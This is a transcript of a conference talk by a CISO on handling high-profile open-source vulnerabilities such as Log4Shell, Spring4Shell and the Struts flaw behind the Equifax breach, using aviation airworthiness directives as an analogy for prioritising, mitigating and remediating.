InfoQ Homepage Presentations Celebrity Vulnerabilities: Effective Response to Critical Production Threats

Celebrity Vulnerabilities: Effective Response to Critical Production Threats

View Presentation

Speed:

43:51

Summary

Alyssa Miller dives into the lessons learned from three major open source security events, the Equifax breach via Struts, the Log4j vulnerabilities and the Spring4Shell exploit.

Bio

Alyssa Miller is the Chief Information Security Officer (CISO) at Epiq Global. Her goal is to change how to look at the responsibility of information security within an organization to focus on enabling efficient development and reducing the friction of onerous security practices.

About the conference

Software is changing the world. QCon empowers software development by facilitating the spread of knowledge and innovation in the developer community. A practitioner-driven conference, QCon is designed for technical team leads, architects, engineering directors, and project managers who influence innovation in their teams.

Transcript

Miller: I'm Alyssa Miller. We're digging into celebrity vulnerabilities. I'm a hacker, a researcher, a cybersecurity author, and a cybersecurity executive. I'm also a pilot. Last year, I tackled something super exciting, a lifelong dream. I've always wanted to be a pilot, but it always seemed out of reach. Then the stars aligned last year, I started training. It took a few months, and then I ended up buying my own airplane. It took a few more months, then I finally passed my check ride, as they call it, which is how I earned my private pilot certificate. I'm officially a pilot. Being a pilot, and being an aircraft owner as well, I learned a lot about what the aviation community does, when it comes to handling a crisis. There's a lot of things obviously that can go wrong in aviation. I'm going to share some of them with you. We're going to talk about a little bit of what the FAA in the United States does, because that's what I'm most familiar with. A lot of these processes are similar with other agencies around the globe. I want to talk to you a little bit about this, because as I started to learn this, I realized there's some applicability here to how we handle cybersecurity incidents.

Aircraft Grounding Analogy to Celebrity Vulnerabilities

One aviation incident, we'll call it, or critical emergency you might be very familiar with, is this one here. This is the Boeing 737 MAX 8. I'm sure a lot of you heard in the news at some point about the issues with the Boeing 737 MAX 8. There were problems that led to a couple crashes that killed a lot of people. As a result, all 737 MAX 8 aircraft around the globe were grounded. They didn't know what was wrong. They knew there was a big problem on their hands, and they knew they had to fix it. They found out pretty quick what was causing it, but they really had to figure out how they were going to fix it. In the meantime, they grounded all of these planes. That ended up changing a lot of flight routes. It affected a lot of travelers when these airlines suddenly had fewer planes that they could fly. Some like Southwest Airlines in the United States were really heavily hit because 737s are all they fly. They had a lot of MAX 8 versions of the 737. They were able to recover. They have a lot of resources, a lot of aircraft in these various airlines. Overall, they were able to recover fairly easily.

What happens when it's not an airline being impacted? What happens when it's someone like me, who maybe only owns one aircraft? This aircraft here is not mine, but this is a Cirrus SR22. Very popular aircraft. Cirrus has been in the market for about 20 to 25 years, something like that. They've been making this aircraft. This aircraft is powered by this engine, a Continental IO-550. You don't need to know all that information, but understand that the way airplanes come together in the first place, it's not like cars. A lot of times you build a car, the same automaker that builds the body and builds the seats and does all that stuff, builds the engines and everything else. Airplanes aren't like that. Airplanes are a lot like how we build software. Different companies make different components and we plug all that together into an aircraft. Continental is a company that makes small aircraft engines. They make piston aircraft engines like this IO-550. Why am I talking about this? That IO-550 from Continental has an issue right now, and it's caused the grounding of a lot of planes. One of the ones in particular that's heavily hit is the SR22. Why is it grounded? Because they have an issue with a crankshaft counterweight. You don't even need to understand what that is either. Understand that because of this issue, they've had to ground a bunch of planes. People who only have one plane suddenly don't have an airplane to fly. I got to thinking, that sounds like how we approach when we have celebrity vulnerabilities. It's this all-hands-on-deck, we have to stop all of the development we're doing, no development work goes on, we have to fix these problems. That's all we can do. It's like the grounding of an aircraft.

Celebrity Vulnerabilities - Apache Struts

What do I mean by celebrity vulnerabilities? That's a term I borrowed from a coworker. When I'm talking about celebrity vulnerabilities, I'm talking about those big, open source, most cases, vulnerabilities that get all the press in the media that we have dealt with quite a bit in the last five to six years. One of the first ones that I can really remember was this vulnerability, the CVE-2017-5638. It was a Struts vulnerability. When it came out, it was fairly critical. It was a high CVSS score. Everybody was worried about it. It was very high severity. A lot of us rushed out and fixed it. Unfortunately, for this company, Equifax, they missed fixing some of them. As a result, they got breached. Actually, at the time, the biggest breach of consumer data in the history of recorded breaches. It all stemmed from this Struts vulnerability that had been well publicized, but didn't necessarily get fixed properly.

Log4j

A little more close to home, some of you might remember a little more recent past, after these 164 million consumers were impacted, we had a new vulnerability show up. It was in this cool little package, Java developers might remember, Log4j. How many of you use that? We had that cool vulnerability, Log4Shell. Everybody blew up. It was all the news, all the rage. Everybody was scrambling to fix it. We had CVE-2021-44228. Then we had CVE-2021-45046. Then we had CVE-2021-45105. All of these vulnerabilities that started showing up related to Log4j. We started fixing when the first one was announced. Then we realized, there's another vulnerability to that version, so we need another new version of Log4j. Then they released another version of Log4j. The reality of all of this was, yes, 91% of Java apps in the world were impacted by this. If you're a Java developer, chances are you had to drop everything, you had to run out and reset all of the work you were doing and focus on fixing this vulnerability. What of course made it more complex was not only were 91% of those Java apps impacted, 61% of those were impacted via some indirect dependency. It wasn't even a direct dependency that developers had included in their code. It was, I've got a dependency that also brings in Log4j with it. It wasn't always the easiest to discover. I got that data from my friends at Snyk, who released quite a bit of information regarding these particular vulnerabilities. That was 2021.

Spring4Shell

It wasn't too long after that we did the whole thing all over again, because we had this wonderful vulnerability that we named Spring4Shell. Now it's Spring, another super common package that a lot of people use in their code. We had one CVE, then two CVEs, then three CVEs again. We went through the same thing. As researchers found the first vulnerability, then they started digging deeper, they started finding more vulnerabilities. Before we knew it, we had three really high severity vulnerabilities in Spring that we had to deal with. Again, developers across the globe were called upon to stop everything they were doing, drop it all on the floor, and go to work trying to fix these vulnerabilities in all of their software. It's exhausting.

OpenSSL

Then, the end of last year, OpenSSL shows up on the scene. We get rumors start popping up, and they start getting confirmed by the maintainers that there's some big announcement about a big vulnerability coming, but no information until five days later. What happened five days later? After everybody dropped everything, got all excited and all set to fix yet another celebrity vulnerability, they dropped the news of the vulnerability and they just weren't even that serious. Over time, we became conditioned by these multiple celebrity vulnerabilities that we need to drop everything and rush out and fix it because there's going to be this critical vulnerability. As soon as attackers find out about it, they're going to come knocking at our door, they're going to be hacking our applications, and we need to fix it. Then we got slapped in the face by OpenSSL when it ended up being much ado about just a little bit. There's got to be a better way.

Avoiding 'All-Hands-On-Deck' Approach

Throughout these, I was right there with you. I've been working in cybersecurity the last 15 years, but I was on the other side of this. I was on the side of the cybersecurity folks who were like, this is really scary. I was also, in my experience, fighting for how can we not stir up the whole world and upheaval everybody's development pipelines, shut everything down, just to fix this? How can we be smarter? That's what I was fighting for in my organizations as these things were going down. When it comes to celebrity vulnerabilities like this, we have to work on avoiding that all-hands-on-deck approach, that drop all the things you're working on and come fix this, because it's not necessary. It's not efficient. It doesn't make us more secure necessarily. Ultimately, it conditions us for incorrect behaviors.

Let's talk about a real process. This process is based on my experience working with these vulnerabilities over the last number of years. I'm going to share with you what I learned, some of the things we were able to do in my organizations in order to address these in a more efficient fashion. When it comes to avoiding that all-hands-on-deck approach, there's three key factors we need to keep in mind. First is prioritization. We need to look at, truly, what is the most immediate attack surface? With Log4j initially, everybody was screaming, upgrade Log4j to the latest, you'd have to get the latest and greatest. As it turns out, if you weren't on a 2.x version, and actually a version higher than 2.8, you were not vulnerable to this JNDI vulnerability everybody was so worried about. First of all, we just have to understand the most immediate attack surface. Then we need to really establish some classifications for in-scope items, because we're going to use that then to lay out a roadmap for the actions that we are going to take. In the aviation community we have this saying that, in an emergency, first thing you should do is wind your watch. The point of that is, when you're presented with an emergency in aviation, we don't want you to instantly react and start flailing around trying to do all the things. We want you to stop, think methodically, and work through a checklist on how to address the situation to try to troubleshoot it, to try to resolve it, or then to respond in an emergency fashion. We need to do the same. That starts with prioritizing.

Next, we need to look at mitigations. Mitigations do a few things for us. They focus on delaying the attacks, not perfection. They need to be things that we quickly implement. We should be looking to layer them to complement those various mitigations, so that what we end up doing creates an overall decently secure situation while we then go and try to work on fixing the vulnerabilities in our code. Then, finally, we have to work on that remediation. How are we actually going to remediate the vulnerabilities in our code? We need to focus on, what is critical that has to be fixed right now. That goes back to our prioritization. Versus, what can we fix via business-as-usual processes, our normal vulnerability management program, perhaps? How do we leverage our backlogs to do that? How do we establish ongoing tracking to make sure that we do complete all the remediation in some specified timeline? Let's dig into this process a little bit more. Along the way, I'm going to help you see how some of those approaches in aviation can be a great guide for us.

Prioritize - Identify the Most Immediate Attack Surface

Let's start with identifying the most immediate attack surface. In aviation, when there's an emergency, one of the first places we can turn is this here. This is what we call the equipment list, or the minimum equipment list, or the standard equipment list. It gets a lot of different names. This is the equipment list for my airplane that you saw way back at the beginning. These are all the things that were installed in that aircraft the day it rolled off the assembly line. As things are added and removed, all of that has to be noted in logs. What that does is that means I constantly have an inventory of exactly what is in my airplane, so that if news comes out about a particular defect that needs to be addressed, I know exactly whether or not it applies to my aircraft. It's a wonderful thing. When it comes to software now, we understand that that's not always the easiest thing to do. I alluded to this before. Modern day open source development, we have this idea of dependencies. Those dependencies can have their own dependencies, which can then have their own dependencies. I'm sure many of you are familiar with the idea of a dependency tree. It's those indirect dependencies that get us. That's what bit Equifax with that Struts vulnerability. They missed it because it was buried a few layers deep in their transient dependencies of some open source package that they had included in their software. They didn't even know it was there. It got discovered by an attacker, they got breached.

There's tools to help with this. Of course, typically, this is something that you'd love to see in your development pipeline. I talked about Snyk before, Black Duck, WhiteSource, ShiftLeft. These are all companies who make what we call software composition analysis, which is a tool that goes through your dependencies and discovers where you have open source dependencies, and alerts you when they're vulnerable. That's a great preparatory thing, but we're not talking about preparations here. We're talking about, what do you do when you find this in your environment, or there's a new celebrity vulnerability you need to figure out if it's in your environment? The good news is, in each of those cases, each of those celebrity vulnerabilities, starting with Log4j, each one of these tool vendors released detection tools as soon as they were able. In most cases, they could be accessed via their freemium product. You could download a free copy of Snyk for instance. You could connect it to your repo. You could let it run. It would go through your dependency tree, and it will tell you immediately if you had a Log4j dependency anywhere in that dependency tree. You can look to these tools to help you. What you're trying to do is understand, first of all, do you even have that dependency? Then, secondly, and these tools do this to varying degrees, is that vulnerability even reachable in your code? Because if it's in a particular function that you're not even using, and there's no way to access that particular object or something through the functionality of your application, then that's probably something you can prioritize further down.

Prioritize - Establish Classifications of In-Scope Items

That leads to our next facet of prioritization, which is establishing classifications of in-scope items. You need to understand what is in scope. In the aviation world, we release, and the FAA calls these Airworthiness Directives. There's different terms for them in different agencies. Ultimately, they're the same thing. It's a notice that says, this defect was discovered, and here's the aircraft that are affected or potentially affected. They list them by model number, by serial number, by manufacture date, all sorts of different criteria that tell you, this plane is involved, or it's not involved, so that you can look at it very quickly and know, does this apply to me or not? They then go into further in many of these Airworthiness Directives talking about, these are aircraft that are most critical and need to be addressed right away. These are aircraft that can wait until a later date, and so on. That's what we want to do with the software. We want to look at the software and say, here's the applications that we need to address right away. Here's ones that we're going to address second, or we might use some type of mitigating control, or whatever, and here's ones that are down the road a little bit later to be addressed.

How do we do this? We want to look at three key facets. We want to look at risk. We want to consider the risk. Our critical applications are probably ones that we want to prioritize higher. We might look at the user load, is it an application that's used by a lot of users, or is it something that's an internal utility app? What about monitoring capability? Those applications that we have no monitoring for, we're probably going to consider a little higher risk, because we can't watch them to see if there's unusual activity or something that's actively trying to exploit the vulnerability that's just been announced. Then we want to consider exploitability. Is it internet facing? If it's not, obviously, that's typically something where we can lower the risk picture of that, and it'll probably be in a later classification. What level of protected access does it have? Maybe it's something that's not available to the internet, but we do expose it to clients over certain connections. Those connections might be a way that attackers could find their way to that particular application. What other environmental aspects? How is it hosted? Where is it hosted? Is it hosted in a cloud? Is it a SaaS application? Do you have an on-prem data center that it's being hosted in? What security controls are in place? All of that is going to play into not only which classification does it go in as far as for remediation, but even, how do you remediate it, or how do you look at mitigating controls?

Then you want to look at just the ease of addressing it. Is it a current code base, or is it something that's out of date? We're looking here for those low hanging fruit items. What can we knock out quickly? Maybe those are ones that we want to do first, because we can just knock them out, while we spend more time digging into ones where maybe it's more difficult. Is the upgrade that's needed going to be backward compatible. When we were looking at Log4j, if you were on 2.8 and you were trying to get to, I think 2.14 and then 2.15, there wasn't necessarily backward compatibility in all of the objects and all of the methods within those versions. That was problematic. Or, worse yet, if you had a 1.x version, it definitely wasn't backward compatible. You need to consider that as you're classifying your applications. Then, again, mitigations. Do you have some other way to mitigate the risk of that application in the short term? That can be a way that you also classify those applications.

Prioritize - Lay Out a Roadmap for Actions

Then you're going use that prioritization to lay out a roadmap for your actions. In the aviation community, I talked about those Airworthiness Directives or those ADs as we call them. This is what happens in those. Remember, I was talking about that IO-550 engine that's in the SR22 and other aircraft? This is an excerpt from the Airworthiness Directive for that. You see, they very specifically lay out the steps for how you go about remediating. It's a plan. Each one of these steps gives you instructions based on what's discovered. As you get through this further, it tells you different things, not shown here, but as you discover different elements, what are the required actions. In some cases, you might have to remove the entire engine and have it rebuilt. In other cases, you don't have to do anything at all. Having that plan of action and understanding what you're going to do for each classification is important. What does that look like when we're talking about our applications? Those roadmaps can be one of two things. They could be sequential. It could be, we're going to implement this mitigation first. Then we're going to do this set of remediations. Then we're going to do another set of remediations. Or they might be things that you can do in parallel. It might be mitigations and remediations that are happening at the same time. Maybe somebody is working on network mitigation while your developers are starting to dig into the code and figure out how are they going to get to the next version of that package. Sometimes these intermix. You might be setting up some that are concurrent, and some that are sequential.

Laying out that roadmap is crucial, because this is part of having a plan. That's back to that wind your watch thing I mentioned, where we talk about in the aviation community: slow down, address it methodically. Look at the situation, understand what you're being faced with, and prioritize appropriately. Then lay out the plan for how you're going to get to remediation. That is the single biggest key. When we went through this with Log4j, I was the sole person in that room saying, we're not going to go in and send developers hog wild trying to fix every single bit of code. Let's stop, and let's talk about this, what are the aspects, or what are the characteristics of the applications that we need to fix first? Let's list out the mitigating controls that we can put in place, and let's lay out a plan for how we're going to address these.

Mitigate - Focus on Delaying Attacks, Not Perfection

Let's dig into mitigating controls. What are mitigating controls? First of all, mitigating controls are focused on delaying attacks. They are not about perfection. When I talk about the 737 MAX 8, the problem with that airplane ultimately, is this thing right here. It's what we call an angle of attack sensor. Basically, what this sensor tells you is, what is the aircraft's pitch relative to ultimately its forward motion. That's not 100% accurate. It basically says, if I'm flying level and straight, that's a low angle of attack. If I pitch up, now my angle of attack increases. If I pitch up and I also start to climb because of that pitch, that could actually decrease it a little bit, depending on speed and other things. It's about, what is my relative motion through the air? It's this angle of attack sensor that was the problem. If you know about the situation with the 737 MAX 8, you know what they didn't do was go and immediately start trying to fix these sensors. Instead, they created a software fix to address the hardware problem. Does this sound familiar to you developers, because I've been there?

What do we do in our space, when we're dealing with a vulnerability like one of these celebrity vulnerabilities? We want to look at what mitigations do we have. With Log4j, I was very fortunate that we had Akamai as our CDN. Along with it as a CDN, it also comes with a web application firewall. AWS has their WAF. Cloudflare has a web application firewall. What that did was that gave us an immediate ability to start to look for those incoming JNDI requests that were the problem. It was basically an exploit of that particular functionality within Log4j, so we could use our web application firewalls to do that. We also had endpoint protection. In my organization, it was CrowdStrike. You might also have Carbon Black, or you might be using Microsoft Defender for endpoints, or any other of the myriad of endpoint detection and response tools that are out there in the market. Again, there, it wasn't long after the vulnerability was announced that those makers were releasing detection rules that could find that and help block against attacks. It wasn't fixing the underlying software at all. It wasn't going into the code of the applications and fixing it, but we had these other layers that could at least help prevent some of those attacks. Of course, right away, people started to find ways to bypass the WAF rules and things like that, and it was a back and forth. Again, it's not about perfection. It's about delaying the attacks, while you take some time to actually fix the code and take care of that particular package that was vulnerable in your software.

Mitigate - Quickly Implemented to Reduce Risk

Mitigations, the next key is they need to be quickly implemented to reduce risk. With the Cirrus aircraft and that IO-550 from Continental, Cirrus came out right away and grounded all of their own aircraft and suggested anybody that was flying an affected aircraft do the same. That's a mitigating factor. It's something that can be done very quickly to make sure that people didn't die. That's what it comes down to. In their case, grounding planes was a quick and easy mitigating control. Again, doesn't fix the problem, but delays the issue until the problem can be fixed. One thing that you can leverage here, if you hadn't heard of this before, is the ModSecurity Core Rule Set from OWASP, Open Web Application Security Project. Get familiar with them at owasp.org. The ModSecurity Core Rule Set is just a set of web application firewalls that are vendor agnostic. Many vendors' web application firewalls can use these general rules from the ModSecurity Core Rule Set to implement new detections and protections in their application firewalls. As you can see here, it was very quickly after the vulnerability in Log4j was announced that this rule set was updated with detections and protections for that Log4j vulnerability. It was continually updated as the multiple CVEs were being released, and new details were being found, new bypasses were being discovered. Again, they were updating it, trying to detect those bypasses and continue to protect us against attack. That's an easy way to implement web application firewall rules. They're going to keep you safe, again, while you work on other tactics to remediate the vulnerability in your environment.

Mitigate - Layer or Complement Mitigation Techniques

Then, finally, from the mitigation, we need to remember that we want to look for ways to layer or complement these mitigation techniques, because they're not perfect. Where we know there's a weakness in one particular mitigation, we want to add in other mitigations to help. I talked before, like those web application firewalls, and those EDR tools, these endpoint detection response tools, those are two ways that even if they bypass the web application firewall, maybe that endpoint tool will find the vulnerability, and see the attack and block it. What does that look like in the aviation community, when we talk about that 737 MAX 8? Take a look at this green column over here. This is everything they did to implement that software fix. Notice, it's not just one thing. They made adjustments to the MCAS. That's the software that we're talking about here. That software is ultimately what reads the input from the angle of attack sensor. It was getting erroneous data from that sensor and reacting in ways that weren't predictable. What did they do? They, first of all, made sure that it wouldn't just accept one input, it had to get input from multiple sensors. They added a disagree light then that said, something's going on here, I'm not getting the right information, one of these sensors is wrong. Rather than react and pitch the airplane down into the ground, which is what was happening, it instead did nothing and just said, the sensors are giving me two different messages. They also added a pilot override, which was another problem, as these planes were pitching down into the ground, the pilots were unable to override the system easily. Then they focused on pilot training, because it was found that the pilots didn't know how to react in this situation.

What does that look like when we're talking about mitigations? When we're talking about mitigations, we want to block wherever possible. We can block the attack, or we can block access to certain functions. We want to do that. That is the key. That is our best mitigation, because that stops the attack. If we can't do that, we want to at least focus on isolation. How can we isolate those vulnerable apps? How can we keep them in their own environment, so at least if something happens, and they get breached, it doesn't become a launchpad for much greater scope of attack against our organization. We want to make sure we layer that in with the blocking. Then, finally, we want to log everything. Turn on all the logging you can in these moments, because your security people are going to be looking for what we call indications of compromise. They're going to be looking for those attacks or those attempted attacks. Turning on logging on your CDNs, on your WAFs, on your web servers, start looking through those access logs, turn up the logging capabilities, turn up the logging capability within your application itself. Then make sure you're feeding that somewhere. Or at least creating that data so your security team can come along and take care of digging through that to see if indeed someone's trying to attack you.

Remediate - Define Critical Remediation vs. Business-As-Usual

Now let's talk about remediation. Remediation is where we're really fixing the applications. We're going in and we're replacing those vulnerable libraries, or we're making some code fix, or doing whatever we need to. I say, we need to look first and foremost. This was a big sticking point for me when we were dealing with Log4j. It was, what do we have to fix right away, versus what can I log to my vulnerability management database? We just fix it in our normal course of addressing vulnerabilities. This is key. This is a core aspect to this because this is how you get out of the mode of fix it all, fix it all right now. We shut everything else down. Looking at the aviation community, now I'm going to talk about my plane. This is my airplane. This is a Piper PA-28. It's the Cherokee series of aircraft. There are a bunch of different models of this. What you see on the right is what we call a wing spar. That wing spar is what attaches the wing to the fuselage of the aircraft. You can see there, it's basically a steel I-beam sort of thing that runs through about maybe two-thirds of the wing and it has that little piece that sticks out, that gets bolted to the fuselage of the aircraft.

My aircraft, the PA-28, that type of aircraft has a problem where these things literally experience corrosion, and they experience fatigue cracking, and it can literally lead to the wings falling off. The FAA came out with guidance that specified what aircraft based on what characteristics were susceptible to this, and needed varying levels of investigation, repair. It was based in part on how many hours the plane had flown, but also what type of use the plane had seen, and some other factors. You had to calculate all this out. We want to be doing the same when it comes to our software. We want to use a risk matrix like this. Maybe you've seen this, this works great. We want to understand, what are the applications that have to get fixed right now? What are the ones that are running Log4Shell 2.8 or greater, they're internet accessible, and they're not behind a WAF, web application firewall. Those are obviously the most critical, because we can't mitigate it. They've got the vulnerable versions, and they're open to the world. We got to fix that first. If it's internal and it's running Log4j 2.5, which wasn't vulnerable to that particular attack, later, it was vulnerable to one of the other CVEs, but maybe that's one we can decrease in risk and not have to remediate as quickly. Laying out those remediation timelines, and saying, for those ones that are less critical, rather than make that the thing we're going to just fix as soon as possible. Let's go back, maybe we have vulnerability management standards that say we've got 60 days to fix that. Let's log it as such and fix it using that process.

Remediate - Leverage your Backlogs

To that end, that means, let's leverage our backlogs. Even if you don't have a vulnerability management program, for those apps that don't fall into that critical got to fix it right now category, log an issue on your backlog. Put it out there, make it a P1, P2, whatever fits for you, but put it on the backlog and fix it in your next release. Now it's just part of your normal process. An example of this with that wing spar situation, I mentioned the corrosion. First of all, when the FAA released it, it wasn't, ground your aircraft and look right now. It was, within the next 100 flight hours of the aircraft, you have to go and complete this, installing inspection panels and whatever. You can see it was 100 hours or 12 months, within 12 months. There, it's not a, you can't fly this plane until you do this inspection, and comply with this service directive, or this Airworthiness Directive. No, they gave you time, so that you could continue your normal work, and then just fix it. Aircraft have to undergo inspections every 12 months anyway. Maybe when you go in for your annual inspection, you could just take care of it then, business-as-usual. Yes, throw it in your backlog. Put it out there, fix it the way that you fix all your other security vulnerabilities. It's a high-risk severity, critical vulnerability that everybody is screaming about in the media. It's a celebrity vulnerability. Everybody says you got to fix it now. Let's be realistic about this. Let's look at where we can afford the time. Let's not scramble to fix everything at once. Let's fix the things that have to be fixed, put everything else in the backlog.

Remediate - Establish Ongoing Tracking of Each Classification

Then we do need to track, ongoing, what are we going to do about this? Because you know as well as I do what happens in these cases, is if you don't track this, they get forgotten about, they never get fixed. In the aviation world, remember I mentioned those annual inspections? This is what I keep. It's called a Squawk list. Every little thing that I notice is not right about my airplane, things that don't affect safety, but they're just a problem that I want to have addressed, I keep a list. Then, for some of them, maybe when I take it in for an oil change, I have them look at it, or when I take it in for annual, I have them look at it. I keep a list and you see here I note the resolutions when they've been achieved. For that last one in particular, you can see there it was inspected. I'm not ready to say that it's resolved, so I'm going to keep looking at it and keep inspecting it over time to make sure that it isn't a crack that I have to worry about.

We need to do the same thing with the software. We need to track each of the apps in each of those classifications and say, so for those critical ones, the ones I said I have to fix right now, we're at 90%, we still have 10% to go. For ones that we completely backlogged, they were low severity, we've got 95% of them we haven't touched yet, and only 5% because maybe they were low hanging fruit, and they were easy to fix, we fixed. Keeping that tracking going is how you make sure that you get through all of these. It's what's going to get your security team off your butt and stop bugging you to fix it. Because you can say, "We're working on it. We've got this. They're logged. They're going to get fixed in this timeframe. We're on track. We're this far along." That's going to be really important. It makes sure that you don't get any surprises like we saw with Equifax.

Review

Just to review, again, prioritize, mitigate, and then remediate. Slow down, fix it one step at a time in a methodical process. That is the key here. Avoid that all-hands-on-deck approach. Remember this quote from Winston Churchill, "Perfection is the enemy of progress." If we are so focused on completely eradicating a vulnerable package from our environment, we're going to get so wrapped around trying to be perfect, we'll never get anything fixed. We will fail to protect ourselves, and the chances of us getting breached, go up.

See more presentations with transcripts

Recorded at:

Sep 27, 2023

Alyssa Miller

InfoQ Software Architects' Newsletter